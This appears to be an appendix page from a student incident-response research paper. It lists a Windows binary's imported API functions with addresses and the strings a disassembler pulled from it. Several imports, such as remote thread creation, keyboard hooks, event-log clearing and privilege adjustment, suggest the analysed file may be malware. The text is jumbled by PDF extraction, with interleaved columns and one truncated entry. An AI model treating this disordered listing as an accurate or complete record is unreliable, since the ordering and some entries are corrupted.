BuildTrusteeWithNameW 00413000
GetTrusteeNameA 00413004
BuildImpersonateTrusteeA 00413008
GetNamedSecurityInfoW 0041300C
CryptGetDefaultProviderA 00413010
CryptDuplicateKey 00413014
RegSetValueExW 00413018
DeregisterEventSource 0041301C
BuildSecurityDescriptorA 00413020
InitiateSystemShutdownW 00413024
RegQueryMultipleValuesW 00413028
LookupAccountNameW 0041302C
RegSetKeySecurity 00413030
RegEnumValueW 00413034
SetServiceObjectSecurity 00413038
RegisterEventSourceA 0041303C
SetEntriesInAuditListW 00413040
BuildTrusteeWithSidW 00413044
RegLoadKeyW 00413048
GetOldestEventLogRecord 0041304C
LookupAccountSidA 00413050
GetTrusteeTypeW 00413054
LookupPrivilegeNameA 00413058
CryptHashData 0041305C
ImpersonateNamedPipeClient 00413060
ObjectOpenAuditAlarmW 00413064
RegEnumKeyExA 00413068
BuildSecurityDescriptorW 0041306C
LookupPrivilegeValueA 00413070
DeleteAce 00413074
OpenProcessToken 00413078
DeleteService 0041307C
CryptDecrypt 00413080
CreateProcessAsUserW 00413084
RevertToSelf 00413088
IsValidSecurityDescriptor 0041308C
RegReplaceKeyW 00413090
CryptAcquireContextW 00413094
LookupAccountSidW 00413098
SetEntriesInAccessListW 0041309C
RegDeleteValueA 004130A0
RegQueryValueExA 004130A4
GetSidIdentifierAuthority 004130A8
CryptGetHashParam 004130AC
PrivilegedServiceAuditAlarmA 004130B0
BuildImpersonateExplicitAccessWithNameA 004130B4
GetLengthSid 004130B8
CryptImportKey 004130BC
AllocateAndInitializeSid 004130C0
BuildImpersonateExplicitAccessWithNameW 004130C4
CryptSignHashW 004130C8
GetServiceDisplayNameA 004130CC
EnumDependentServicesA 004130D0
CryptReleaseContext 004130D4
GetExplicitEntriesFromAclW 004130D8
GetUserNameW 004130DC
CryptEnumProvidersW 004130E0
FindFirstFreeAce 004130E4
CloseServiceHandle 004130E8
GetCurrentHwProfileW 004130EC
CancelOverlappedAccess 004130F0
StartServiceA 004130F4
GetKeyNameTextA 00413328
SetWindowPos 0041332C
RegisterWindowMessageW 00413330
UnionRect 00413334
SetCaretBlinkTime 00413338
DestroyAcceleratorTable 0041333C
ChangeDisplaySettingsW 00413340
LoadImageA 00413344
SetMenuItemBitmaps 00413348
DdeUnaccessData 0041334C
DefWindowProcW 00413350
CreateIconFromResource 00413354
EditWndProc 00413358
ChangeMenuW 0041335C
DrawEdge 00413360
GetDlgItem 00413364
InternalGetWindowText 00413368
ChangeDisplaySettingsA 0041336C
InsertMenuW 00413370
SetMenuInfo 00413374
DdeSetUserHandle 00413378
GetMessageW 0041337C
ModifyMenuW 00413380
MsgWaitForMultipleObjectsEx 00413384
DrawAnimatedRects 00413388
GetUserObjectSecurity 0041338C
GetMenuCheckMarkDimensions 00413390
GetMenu 00413394
DestroyCursor 00413398
IsDlgButtonChecked 0041339C
GetCaretBlinkTime 004133A0
GetShellWindow 004133A4
GetClipboardOwner 004133A8
CallWindowProcA 004133AC
GetWindowPlacement 004133B0
TabbedTextOutA 004133B4
LoadKeyboardLayoutW 004133B8
IsZoomed 004133BC
CreateAcceleratorTableW 004133C0
FillRect 004133C4
RealGetWindowClass 004133C8
ToUnicodeEx 004133CC
OpenWindowStationW 004133D0
IsCharUpperA 004133D4
InvalidateRect 004133D8
GetMenuStringW 004133DC
IsDialogMessageW 004133E0
ReleaseCapture 004133E4
GetSystemMenu 004133E8
SetCapture 004133EC
GrayStringA 004133F0
SwitchDesktop 004133F4
SetRect 004133F8
GetUpdateRgn 004133FC
GetDlgItemInt 00413400
LoadMenuA 00413404
CoCreateInstance 0041340C
CoRegisterMessageFilter 00413410
OleCreateLink 00413414
OleCreateEx 00413418
OleLoad 0041341C
GetConvertStg 00413420
CoQueryReleaseObject 00413424
CreateDataAdviseHolder 00413428
PathFindExtensionA 00413658
SHRegGetUSValueW 0041365C
UrlGetPartA 00413660
StrToIntA 00413664
StrCSpnW 00413668
PathMakeSystemFolderA 0041366C
PathFileExistsW 00413670
PathGetCharTypeA 00413674
StrRStrIW 00413678
UrlCombineW 0041367C
SHRegCreateUSKeyW 00413680
PathGetCharTypeW 00413684
PathSetDlgItemPathW 00413688
UrlCanonicalizeA 0041368C
PathIsFileSpecW 00413690
PathIsSystemFolderA 00413694
PathBuildRootW 00413698
SHRegDeleteEmptyUSKeyA 0041369C
ChrCmpIW 004136A0
SHRegGetBoolUSValueA 004136A4
PathFindFileNameA 004136A8
SHIsLowMemoryMachine 004136AC
UrlUnescapeA 004136B0
SHRegDuplicateHKey 004136B4
SHDeleteKeyW 004136B8
StrStrIW 004136BC
UrlCanonicalizeW 004136C0
SHEnumKeyExW 004136C4
PathCompactPathA 004136C8
PathSkipRootA 004136CC
PathUnmakeSystemFolderW 004136D0
StrToIntExW 004136D4
PathQuoteSpacesA 004136D8
PathSearchAndQualifyA 004136DC
SHQueryValueExW 004136E0
PathRemoveArgsW 004136E4
PathFindNextComponentW 004136E8
PathIsUNCA 004136EC
PathIsContentTypeA 004136F0
StrRetToBufW 004136F4
PathFindFileNameW 004136F8
SHRegDeleteUSValueA 004136FC
SHDeleteValueW 00413700
StrCSpnIA 00413704
PathCommonPrefixW 00413708

PathIsPrefixW 0041370C UrlIsNoHistoryW 00413710

SHCopyKeyW 00413714

SHDeleteKeyA 00413718 SHRegSetUSValueW 0041371C

PathRelativePathToA 00413720

PathMakePrettyW 00413724

PathAppendA 00413728

UrlIsNoHistoryA 0041372C

EnumCalendarInfoExA 00413734 Module32Next 00413738

EnumSystemLocalesW 0041373C

Heap32ListNext 00413740 GetUserDefaultLCID 00413744

EnumTimeFormatsA 00413748

lstrcmpiA 0041374C GetQueuedCompletionStatus 00413750

FreeLibrary 00413754

EnumSystemLocalesA 00413758

Page 55: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

RegCloseKey 004130F8

RegQueryValueA 004130FC CryptVerifySignatureW 00413100

AdjustTokenPrivileges 00413104

QueryServiceStatus 00413108 RegConnectRegistryA 0041310C

GetTokenInformation 00413110

GetAccessPermissionsForObjectW 00413114 RegQueryValueW 00413118

AccessCheckAndAuditAlarmW 0041311C

SetSecurityDescriptorSacl 00413120 AreAnyAccessesGranted 00413124

ObjectCloseAuditAlarmA 00413128

QueryServiceConfigA 0041312C ClearEventLogW 00413130

RegUnLoadKeyA 00413134

LookupPrivilegeNameW 00413138 GetSecurityInfo 0041313C

RegEnumKeyExW 00413140

ObjectPrivilegeAuditAlarmW 00413144

GetTrusteeTypeA 00413148

RegOpenKeyExW 0041314C

RegCreateKeyA 00413150 IsTextUnicode 00413154

OpenEventLogW 00413158

CryptEnumProviderTypesW 0041315C RegRestoreKeyW 00413160

CryptGetProvParam 00413164

ChangeServiceConfigA 00413168 RegSaveKeyA 0041316C

BuildExplicitAccessWithNameW 00413170

GetSecurityDescriptorSacl 00413174 RegLoadKeyA 00413178

GetMultipleTrusteeA 0041317C

AddAccessAllowedAce 00413180 SetAclInformation 00413184

ControlService 00413188

GetSecurityInfoExW 0041318C RegRestoreKeyA 00413190

ObjectOpenAuditAlarmA 00413194

CopySid 00413198 OpenSCManagerA 0041319C

RegQueryMultipleValuesA 004131A0

OpenThreadToken 004131A4 LogonUserW 004131A8

CryptDestroyHash 004131AC

AbortSystemShutdownW 004131B0 GetAclInformation 004131B4

CreateServiceW 004131B8

CryptGenKey 004131BC LookupSecurityDescriptorPartsW 004131C0

ConvertAccessToSecurityDescriptorA 004131C4 SetEntriesInAccessListA 004131C8

AbortSystemShutdownA 004131CC

SetEntriesInAclW 004131D0 GetFileSecurityA 004131D4

OpenEventLogA 004131D8

CryptSetHashParam 004131DC

CryptSetProviderExA 004131E0

QueryServiceConfigW 004131E4

CryptSetProviderExW 004131E8 OpenBackupEventLogW 004131EC

SendMessageTimeoutW 004131F4

TileChildWindows 004131F8 EndTask 004131FC

IsDialogMessageA 00413200

DdeQueryNextServer 00413204 FlashWindowEx 00413208

GetKeyboardLayoutNameA 0041320C

DdeFreeDataHandle 00413210

CoGetInterfaceAndReleaseStream 0041342C

WriteClassStm 00413430 StgGetIFillLockBytesOnFile 00413434

OleBuildVersion 00413438

OleRegEnumFormatEtc 0041343C GetRunningObjectTable 00413440

UtGetDvtd32Info 00413444

OleCreateStaticFromData 00413448 OleCreateFromFile 0041344C

OleDoAutoConvert 00413450

OpenOrCreateStream 00413454 OleNoteObjectVisible 00413458

CreateAntiMoniker 0041345C

OleMetafilePictFromIconAndLabel 00413460 CoUnmarshalInterface 00413464

OleCreateEmbeddingHelper 00413468

CoRegisterClassObject 0041346C FreePropVariantArray 00413470

OleSetAutoConvert 00413474

OleTranslateAccelerator 00413478

OleSaveToStream 0041347C

CoGetTreatAsClass 00413480

CoRevertToSelf 00413484 CoInitializeEx 00413488

OleIsCurrentClipboard 0041348C

OleConvertIStorageToOLESTREAMEx 00413490

CoGetCurrentLogicalThreadId 00413494

CreateItemMoniker 00413498 CoGetMalloc 0041349C

WriteClassStg 004134A0

ReadStringStream 004134A4 CreateGenericComposite 004134A8

PropVariantCopy 004134AC

StgOpenStorageEx 004134B0 OleSave 004134B4

IsAccelerator 004134B8

BindMoniker 004134BC CoGetCallContext 004134C0

CoFreeUnusedLibraries 004134C4

StgOpenStorage 004134C8 UpdateDCOMSettings 004134CC

CoGetMarshalSizeMax 004134D0

OleGetIconOfFile 004134D4 StgOpenStorageOnILockBytes 004134D8

CoQueryProxyBlanket 004134DC

UtConvertDvtd16toDvtd32 004134E0 CoQueryAuthenticationServices 004134E4

OleSetClipboard 004134E8

DoDragDrop 004134EC IsEqualGUID 004134F0

CoReleaseMarshalData 004134F4 OleCreate 004134F8

CoQueryClientBlanket 004134FC

ReadClassStm 00413500 ReleaseStgMedium 00413504

CreateFileMoniker 00413508

OleSetMenuDescriptor 0041350C

CreatePointerMoniker 00413510

CoTreatAsClass 00413514

CoFreeAllLibraries 00413518 StgGetIFillLockBytesOnILockBytes 0041351C

CreateILockBytesOnHGlobal 00413520

CreateObjrefMoniker 00413524 CreateBindCtx 00413528

StringFromIID 0041352C

CoInitializeSecurity 00413530 CoBuildVersion 00413534

WriteStringStream 00413538

CoCreateFreeThreadedMarshaler 0041353C

Thread32First 0041375C

GetNamedPipeInfo 00413760 GlobalUnlock 00413764

FreeEnvironmentStringsA 00413768

GlobalFree 0041376C GetCurrentThread 00413770

PeekConsoleInputA 00413774

FindResourceExA 00413778 VirtualProtect 0041377C

OpenProcess 00413780

GetSystemDefaultLangID 00413784 GetEnvironmentStringsA 00413788

VirtualAlloc 0041378C

HeapLock 00413790 ConvertDefaultLocale 00413794

SetVolumeLabelW 00413798

SizeofResource 0041379C SetFileApisToOEM 004137A0

FileTimeToLocalFileTime 004137A4

GetFullPathNameW 004137A8

GetDiskFreeSpaceW 004137AC

SetSystemTime 004137B0

EnumDateFormatsExW 004137B4 CallNamedPipeA 004137B8

FindCloseChangeNotification 004137BC

SetEvent 004137C0 SetProcessPriorityBoost 004137C4

IsBadWritePtr 004137C8

TerminateThread 004137CC EnumResourceTypesW 004137D0

GetPrivateProfileIntW 004137D4

OpenFileMappingA 004137D8 CopyFileA 004137DC

lstrcpyn 004137E0

ReadConsoleW 004137E4 PeekNamedPipe 004137E8

CreateNamedPipeW 004137EC

CreateDirectoryExA 004137F0 SetThreadLocale 004137F4

ClearCommBreak 004137F8

SetStdHandle 004137FC GetNumberOfConsoleMouseButtons 00413800

GetFileAttributesExW 00413804

WriteConsoleOutputW 00413808 FlushViewOfFile 0041380C

PulseEvent 00413810

GetLocalTime 00413814 GetWindowsDirectoryA 00413818

SetCommConfig 0041381C

GetFileAttributesW 00413820 GetConsoleTitleA 00413824

SetProcessAffinityMask 00413828 GetSystemInfo 0041382C

FlushInstructionCache 00413830

SwitchToThread 00413834 GetCurrentProcessId 00413838

DosDateTimeToFileTime 0041383C

EscapeCommFunction 00413840

HeapDestroy 00413844

SetCurrentDirectoryA 00413848

GetConsoleScreenBufferInfo 0041384C FindFirstFileA 00413850

CreateNamedPipeA 00413854

GetThreadLocale 00413858 GetTempFileNameA 0041385C

GlobalUnWire 00413860

SwitchToFiber 00413864 LocalFileTimeToFileTime 00413868

CreateTapePartition 0041386C

GlobalAddAtomW 00413870


SetThreadDesktop 00413214

GetInputState 00413218 SetKeyboardState 0041321C

SetMenuItemInfoW 00413220

GetMenuItemID 00413224 GrayStringW 00413228

EmptyClipboard 0041322C

CreatePopupMenu 00413230 LoadStringW 00413234

CallMsgFilterA 00413238

GetActiveWindow 0041323C RegisterHotKey 00413240

DialogBoxParamA 00413244

ExcludeUpdateRgn 00413248 GetAncestor 0041324C

GetSysColor 00413250

GetDlgCtrlID 00413254 DdeFreeStringHandle 00413258

LoadStringA 0041325C

MonitorFromWindow 00413260

SetDeskWallpaper 00413264

DrawFrame 00413268

RegisterWindowMessageA 0041326C GetMenuItemRect 00413270

LoadMenuIndirectW 00413274

EnumDisplaySettingsExW 00413278 BeginDeferWindowPos 0041327C

OemToCharW 00413280

GetMonitorInfoW 00413284 NotifyWinEvent 00413288

GetKeyState 0041328C

RemoveMenu 00413290 SetDlgItemTextW 00413294

GetDesktopWindow 00413298

GetMessageTime 0041329C GetClipCursor 004132A0

UpdateWindow 004132A4

GetPriorityClipboardFormat 004132A8 DrawFocusRect 004132AC

DragDetect 004132B0

GetUpdateRect 004132B4 GetCursor 004132B8

SetLastErrorEx 004132BC

LoadBitmapA 004132C0 CharLowerA 004132C4

SetMenuDefaultItem 004132C8

DdeCreateStringHandleW 004132CC GetDialogBaseUnits 004132D0

WindowFromDC 004132D4

GetAltTabInfo 004132D8 GetMenuState 004132DC

DdeClientTransaction 004132E0 FindWindowW 004132E4

CreateWindowExA 004132E8

EnumDisplaySettingsA 004132EC DdeInitializeA 004132F0

EnumPropsExW 004132F4

OemToCharBuffW 004132F8

SetWindowsHookExW 004132FC

UnhookWindowsHookEx 00413300

SetMenuItemInfoA 00413304 WinHelpW 00413308

GetKeyboardLayout 0041330C

SetClipboardViewer 00413310 GetNextDlgGroupItem 00413314

ChildWindowFromPoint 00413318

EndPaint 0041331C EndMenu 00413320

ValidateRgn 00413324

RegisterDragDrop 00413540

OleCreateLinkToFile 00413544 StgCreateStorageEx 00413548

CoGetPSClsid 0041354C

OleCreateLinkEx 00413550 OleRegGetUserType 00413554

OleCreateLinkFromDataEx 00413558

CoRegisterChannelHook 0041355C OleRegGetMiscStatus 00413560

CreateOleAdviseHolder 00413564

CoRegisterSurrogate 00413568 OleCreateFromDataEx 0041356C

CoDosDateTimeToFileTime 00413570

PropVariantClear 00413574 ReadClassStg 00413578

StgOpenAsyncDocfileOnIFillLockBytes 0041357C OleCreateDefaultHandler 00413580

OleCreateMenuDescriptor 00413584

PathRemoveBlanksW 0041358C

UrlCompareA 00413590

PathFindOnPathA 00413594

SHAutoComplete 00413598 UrlGetLocationW 0041359C

PathIsRelativeW 004135A0

SHRegWriteUSValueW 004135A4 PathIsContentTypeW 004135A8

StrToIntW 004135AC

PathIsSameRootW 004135B0 SHRegQueryInfoUSKeyW 004135B4

SHRegGetUSValueA 004135B8

SHDeleteEmptyKeyW 004135BC StrCatW 004135C0

PathIsUNCW 004

ColorHLSToRGB 004135C8 PathStripPathW 004135CC

HashData 004135D0

StrChrW 004135D4 SHRegCloseUSKey 004135D8

StrDupA 004135DC

UrlGetPartW 004135E0 SHEnumValueA 004135E4

SHSetValueA 004135E8

PathMakeSystemFolderW 004135EC SHSkipJunction 004135F0

PathFindSuffixArrayW 004135F4

PathIsURLA 004135F8 PathGetDriveNumberA 004135FC

SHCopyKeyA 00413600

PathRenameExtensionA 00413604 StrNCatA 00413608

PathFileExistsA 0041360C StrPBrkA 00413610

PathCombineA 00413614

PathCompactPathW 00413618 PathRemoveArgsA 0041361C

SHRegQueryInfoUSKeyA 00413620

StrToIntExA 00413624

StrStrW 00413628

PathFindSuffixArrayA 0041362C

SHStrDupW 00413630 StrRChrIW 00413634

PathCanonicalizeA 00413638

StrRetToBufA 0041363C StrCmpIW 00413640

SHRegSetUSValueA 00413644

SHRegOpenUSKeyW 00413648 SHRegWriteUSValueA 0041364C

StrRetToStrA 00413650

UrlHashA 00413654

WaitForSingleObject 00413874

CreateMutexA 00413878 GetShortPathNameW 0041387C

FoldStringW 00413880

CompareStringA 00413884 ReadFile 00413888

FreeLibraryAndExitThread 0041388C

CompareFileTime 00413890 GetNamedPipeHandleStateA 00413894

GetUserDefaultLangID 00413898

SetDefaultCommConfigA 0041389C GetModuleHandleA 004138A0

GetSystemTime 004138A4

GetVolumeInformationW 004138A8 GetLongPathNameA 004138AC

Process32Next 004138B0

SetFileApisToANSI 004138B4 FlushFileBuffers 004138B8

GetSystemDirectoryW 004138BC

GetCommModemStatus 004138C0

GlobalSize 004138C4

SetFileAttributesA 004138C8

SetThreadPriority 004138CC CancelIo 004138D0

EnumCalendarInfoA 004138D4

TlsFree 004138D8 QueryPerformanceCounter 004138DC

GetCurrentDirectoryW 004138E0

WriteFileGather 004138E4 DefineDosDeviceW 004138E8

SetDefaultCommConfigW 004138EC

GetDevicePowerState 004138F0 SetPriorityClass 004138F4

GetPrivateProfileStringA 004138F8

GetNumberOfConsoleInputEvents 004138FC ReadDirectoryChangesW 00413900

EndUpdateResourceA 00413904

IsDBCSLeadByteEx 00413908 OpenMutexA 0041390C

SetTimeZoneInformation 00413910

lstrlen 00413914 CreateThread 00413918

CreateRemoteThread 0041391C

CompareStringW 00413920 SetProcessShutdownParameters 00413924

Toolhelp32ReadProcessMemory 00413928

GetPrivateProfileStructW 0041392C GetProcessHeaps 00413930

GetDateFormatW 00413934

SetTapeParameters 00413938 SetConsoleActiveScreenBuffer 0041393C

OpenMutexW 00413940 IsSystemResumeAutomatic 00413944

SetTapePosition 00413948

EraseTape 0041394C PostQueuedCompletionStatus 00413950

LocalFree 00413954

GetThreadPriority 00413958

FillConsoleOutputCharacterW 0041395C

lstrcmp 00413960

WaitForSingleObjectEx 00413964 GetComputerNameW 00413968

GetThreadTimes 0041396C

EnumCalendarInfoW 00413970 BackupWrite 00413974

SuspendThread 00413978


Comment Strings:

.text:004010A0 00000015 C nPniTP2S.~4-2$Ucnn-G

.text:00401A8C 00000010 C 5hG5`A$d$_fnVF9

.text:00401B28 00000011 C Yx>5;R[¦YA/<QlGy

.text:00401C1C 00000012 C >F;F2mS4d+Y¦[\\i(o

.text:00401C44 0000001F C Q)+X\"½[ad?Fn`+XdQVD-(^Ad>x:2`i

.text:00401C63 00000006 C ha[m_

.text:00402C0C 00000023 C Gn)4V8\\9#TnPcQ~(9kiF[#F:fF$^Q//#<5

.text:0040360C 00000005 C UhxP

.text:004037B1 0000001F C \\eGl#eS?)AkVUûP\"½a2>_5on.;RQ]x

.text:00403880 00000016 C c^+;V-<#_b^kV~2a-8P?/

.text:00403B30 0000001C C hRn\"#h8V$D3`G[iU\"cdXT!V`Rna

.text:00403B78 00000017 C GSi+nab(Q(R>6x)e8yVnU5

.text:00403BA1 00000021 C 5ûS8-½<<fo3nYmhn`-_9-h`4`V$i]Y.o

.text:0040445C 00000012 C ?Fx<9A6#5<h);<eb$

.rdata:00413980 0000000A C Xz!7j=D\aZf

.rdata:00413994 00000009 C d]5\r RP.h

.rdata:004139BD 00000008 C HhX<APc=

.rdata:004139C8 0000000B C jVX}pBgCO\t

.rdata:004139D5 00000009 C 7MGt_jXSZ

.rdata:004139DF 00000009 C aXb\"\x1B%jCD

.rdata:004139F3 00000007 C Z.0H!/V

.rdata:004139FB 00000009 C ~T<\x1B\\\tZ\x1Br

.rdata:00413A05 00000009 C -Y]%J()\vL

.rdata:00413A10 00000010 C T\n\b@@VecKiDW|Y\v\t

.rdata:00413A23 0000000E C $x4GFZ\\%k*oTW5

.rdata:00413A35 00000008 C [>&{~~ 7

.rdata:00413A3E 00000006 C 7>|n\vO

.rdata:00413A45 00000007 C /zYjKK<

.rdata:00413A56 00000007 C $x\\XgBx

.rdata:00413A5E 00000006 C 3&.Hw

.rdata:00414462 00000016 C BuildTrusteeWithNameW

.rdata:0041447A 00000010 C GetTrusteeNameA

.rdata:0041448C 00000019 C BuildImpersonateTrusteeA

.rdata:004144A8 00000016 C GetNamedSecurityInfoW

.rdata:004144C0 00000019 C CryptGetDefaultProviderA

.rdata:004144DC 00000012 C CryptDuplicateKey

.rdata:004144F0 0000000F C RegSetValueExW

.rdata:00414502 00000016 C DeregisterEventSource

.rdata:0041451A 00000019 C BuildSecurityDescriptorA

.rdata:00414536 00000018 C InitiateSystemShutdownW

.rdata:00414550 00000018 C RegQueryMultipleValuesW

.rdata:0041456A 00000013 C LookupAccountNameW

.rdata:00414580 00000012 C RegSetKeySecurity

.rdata:00414594 0000000E C RegEnumValueW

.rdata:004145A4 00000019 C SetServiceObjectSecurity

.rdata:004145C0 00000015 C RegisterEventSourceA

.rdata:004145D8 00000017 C SetEntriesInAuditListW

.rdata:004145F2 00000015 C BuildTrusteeWithSidW

.rdata:0041460A 0000000C C RegLoadKeyW

.rdata:00414618 00000018 C GetOldestEventLogRecord

.rdata:00414632 00000012 C LookupAccountSidA

.rdata:00414646 00000010 C GetTrusteeTypeW

.rdata:00414658 00000015 C LookupPrivilegeNameA

.rdata:00414670 0000000E C CryptHashData

.rdata:00414680 0000001B C ImpersonateNamedPipeClient

.rdata:0041469E 00000016 C ObjectOpenAuditAlarmW

.rdata:004146B6 0000000E C RegEnumKeyExA

.rdata:004146C6 00000019 C BuildSecurityDescriptorW

.rdata:004146E2 00000016 C LookupPrivilegeValueA

.rdata:004146FA 0000000A C DeleteAce

.rdata:00414706 00000011 C OpenProcessToken

.rdata:0041471A 0000000E C DeleteService

.rdata:0041472A 0000000D C CryptDecrypt

.rdata:0041473A 00000015 C CreateProcessAsUserW

.rdata:00414752 0000000D C RevertToSelf

.rdata:00414762 0000001A C IsValidSecurityDescriptor

.rdata:0041477E 0000000F C RegReplaceKeyW

.rdata:00416AC4 00000009 C SetEvent

.rdata:00416AD0 00000018 C SetProcessPriorityBoost

.rdata:00416AEA 0000000E C IsBadWritePtr

.rdata:00416AFA 00000010 C TerminateThread

.rdata:00416B0C 00000013 C EnumResourceTypesW

.rdata:00416B22 00000016 C GetPrivateProfileIntW

.rdata:00416B3A 00000011 C OpenFileMappingA

.rdata:00415152 00000010 C GetMenuItemRect

.rdata:00415164 00000012 C LoadMenuIndirectW

.rdata:00415178 00000017 C EnumDisplaySettingsExW

.rdata:00415192 00000014 C BeginDeferWindowPos

.rdata:004151A8 0000000B C OemToCharW

.rdata:004151B6 00000010 C GetMonitorInfoW

.rdata:004151C8 0000000F C NotifyWinEvent

.rdata:004151DA 0000000C C GetKeyState

.rdata:004151E8 0000000B C RemoveMenu

.rdata:004151F6 00000010 C SetDlgItemTextW

.rdata:00415208 00000011 C GetDesktopWindow

.rdata:0041521C 0000000F C GetMessageTime

.rdata:0041522E 0000000E C GetClipCursor

.rdata:0041523E 0000000D C UpdateWindow

.rdata:0041524E 0000001B C GetPriorityClipboardFormat

.rdata:0041526C 0000000E C DrawFocusRect

.rdata:0041527C 0000000B C DragDetect

.rdata:0041528A 0000000E C GetUpdateRect

.rdata:0041529A 0000000A C GetCursor

.rdata:004152A6 0000000F C SetLastErrorEx

.rdata:004152B8 0000000C C LoadBitmapA

.rdata:004152C6 0000000B C CharLowerA

.rdata:004152D4 00000013 C SetMenuDefaultItem

.rdata:004152EA 00000017 C DdeCreateStringHandleW

.rdata:00415304 00000013 C GetDialogBaseUnits

.rdata:0041531A 0000000D C WindowFromDC

.rdata:0041532A 0000000E C GetAltTabInfo

.rdata:0041533A 0000000D C GetMenuState

.rdata:0041534A 00000015 C DdeClientTransaction

.rdata:00415362 0000000C C FindWindowW

.rdata:00415370 00000010 C CreateWindowExA

.rdata:00415382 00000015 C EnumDisplaySettingsA

.rdata:0041539A 0000000F C DdeInitializeA

.rdata:004153AC 0000000D C EnumPropsExW

.rdata:004153BC 0000000F C OemToCharBuffW

.rdata:004153CE 00000012 C SetWindowsHookExW

.rdata:004153E2 00000014 C UnhookWindowsHookEx

.rdata:004153F8 00000011 C SetMenuItemInfoA

.rdata:0041540C 00000009 C WinHelpW

.rdata:00415418 00000012 C GetKeyboardLayout

.rdata:0041542C 00000013 C SetClipboardViewer

.rdata:00415442 00000014 C GetNextDlgGroupItem

.rdata:00415458 00000015 C ChildWindowFromPoint

.rdata:00415470 00000009 C EndPaint

.rdata:0041547C 00000008 C EndMenu

.rdata:00415486 0000000C C ValidateRgn

.rdata:00415494 00000010 C GetKeyNameTextA

.rdata:004154A6 0000000D C SetWindowPos

.rdata:004154B6 00000017 C RegisterWindowMessageW

.rdata:004154D0 0000000A C UnionRect

.rdata:004154DC 00000012 C SetCaretBlinkTime

.rdata:004154F0 00000018 C DestroyAcceleratorTable

.rdata:0041550A 00000017 C ChangeDisplaySettingsW

.rdata:00415524 0000000B C LoadImageA

.rdata:00415532 00000013 C SetMenuItemBitmaps

.rdata:00415548 00000010 C DdeUnaccessData

.rdata:0041555A 0000000F C DefWindowProcW

.rdata:0041556C 00000017 C CreateIconFromResource

.rdata:00415586 0000000C C EditWndProc

.rdata:00415594 0000000C C ChangeMenuW


.rdata:00414790 00000015 C CryptAcquireContextW

.rdata:004147A8 00000012 C LookupAccountSidW

.rdata:004147BC 00000018 C SetEntriesInAccessListW

.rdata:004147D6 00000010 C RegDeleteValueA

.rdata:004147E8 00000011 C RegQueryValueExA

.rdata:004147FC 0000001A C GetSidIdentifierAuthority

.rdata:00414818 00000012 C CryptGetHashParam

.rdata:0041482C 0000001D C PrivilegedServiceAuditAlarmA

.rdata:0041484C 00000028 C BuildImpersonateExplicitAccessWithNameA

.rdata:00414876 0000000D C GetLengthSid

.rdata:00414886 0000000F C CryptImportKey

.rdata:00414898 00000019 C AllocateAndInitializeSid

.rdata:004148B4 00000028 C BuildImpersonateExplicitAccessWithNameW

.rdata:004148DE 0000000F C CryptSignHashW

.rdata:004148F0 00000017 C GetServiceDisplayNameA

.rdata:0041490A 00000017 C EnumDependentServicesA

.rdata:00414924 00000014 C CryptReleaseContext

.rdata:0041493A 0000001B C GetExplicitEntriesFromAclW

.rdata:00414958 0000000D C GetUserNameW

.rdata:00414968 00000014 C CryptEnumProvidersW

.rdata:0041497E 00000011 C FindFirstFreeAce

.rdata:00414992 00000013 C CloseServiceHandle

.rdata:004149A8 00000015 C GetCurrentHwProfileW

.rdata:004149C0 00000017 C CancelOverlappedAccess

.rdata:004149DA 0000000E C StartServiceA

.rdata:004149EA 0000000C C RegCloseKey

.rdata:004149F8 0000000F C RegQueryValueA

.rdata:00414A0A 00000016 C CryptVerifySignatureW

.rdata:00414A22 00000016 C AdjustTokenPrivileges

.rdata:00414A3A 00000013 C QueryServiceStatus

.rdata:00414A50 00000014 C RegConnectRegistryA

.rdata:00414A66 00000014 C GetTokenInformation

.rdata:00414A7C 0000001F C GetAccessPermissionsForObjectW

.rdata:00414A9E 0000000F C RegQueryValueW

.rdata:00414AB0 0000001A C AccessCheckAndAuditAlarmW

.rdata:00414ACC 0000001A C SetSecurityDescriptorSacl

.rdata:00414AE8 00000016 C AreAnyAccessesGranted

.rdata:00414B00 00000017 C ObjectCloseAuditAlarmA

.rdata:00414B1A 00000014 C QueryServiceConfigA

.rdata:00414B30 0000000F C ClearEventLogW

.rdata:00414B42 0000000E C RegUnLoadKeyA

.rdata:00414B52 00000015 C LookupPrivilegeNameW

.rdata:00414B6A 00000010 C GetSecurityInfo

.rdata:00414B7C 0000000E C RegEnumKeyExW

.rdata:00414B8C 0000001B C ObjectPrivilegeAuditAlarmW

.rdata:00414BAA 00000010 C GetTrusteeTypeA

.rdata:00414BBC 0000000E C RegOpenKeyExW

.rdata:00414BCC 0000000E C RegCreateKeyA

.rdata:00414BDC 0000000E C IsTextUnicode

.rdata:00414BEC 0000000E C OpenEventLogW

.rdata:00414BFC 00000018 C CryptEnumProviderTypesW

.rdata:00414C16 0000000F C RegRestoreKeyW

.rdata:00414C28 00000012 C CryptGetProvParam

.rdata:00414C3C 00000015 C ChangeServiceConfigA

.rdata:00414C54 0000000C C RegSaveKeyA

.rdata:00414C62 0000001D C BuildExplicitAccessWithNameW

.rdata:00414C82 0000001A C GetSecurityDescriptorSacl

.rdata:00414C9E 0000000C C RegLoadKeyA

.rdata:00414CAC 00000014 C GetMultipleTrusteeA

.rdata:00414CC2 00000014 C AddAccessAllowedAce

.rdata:00414CD8 00000012 C SetAclInformation

.rdata:00414CEC 0000000F C ControlService

.rdata:00414CFE 00000013 C GetSecurityInfoExW

.rdata:00414D14 0000000F C RegRestoreKeyA

.rdata:00414D26 00000016 C ObjectOpenAuditAlarmA

.rdata:00414D3E 00000008 C CopySid

.rdata:00414D48 0000000F C OpenSCManagerA

.rdata:00414D5A 00000018 C RegQueryMultipleValuesA

.rdata:00414D74 00000010 C OpenThreadToken

.rdata:00414D86 0000000B C LogonUserW

.rdata:004155A2 00000009 C DrawEdge

.rdata:004155AE 0000000B C GetDlgItem

.rdata:004155BC 00000016 C InternalGetWindowText

.rdata:004155D4 00000017 C ChangeDisplaySettingsA

.rdata:004155EE 0000000C C InsertMenuW

.rdata:004155FC 0000000C C SetMenuInfo

.rdata:0041560A 00000011 C DdeSetUserHandle

.rdata:0041561E 0000000C C GetMessageW

.rdata:0041562C 0000000C C ModifyMenuW

.rdata:0041563A 0000001C C MsgWaitForMultipleObjectsEx

.rdata:00415658 00000012 C DrawAnimatedRects

.rdata:0041566C 00000016 C GetUserObjectSecurity

.rdata:00415684 0000001B C GetMenuCheckMarkDimensions

.rdata:004156A2 00000008 C GetMenu

.rdata:004156AC 0000000E C DestroyCursor

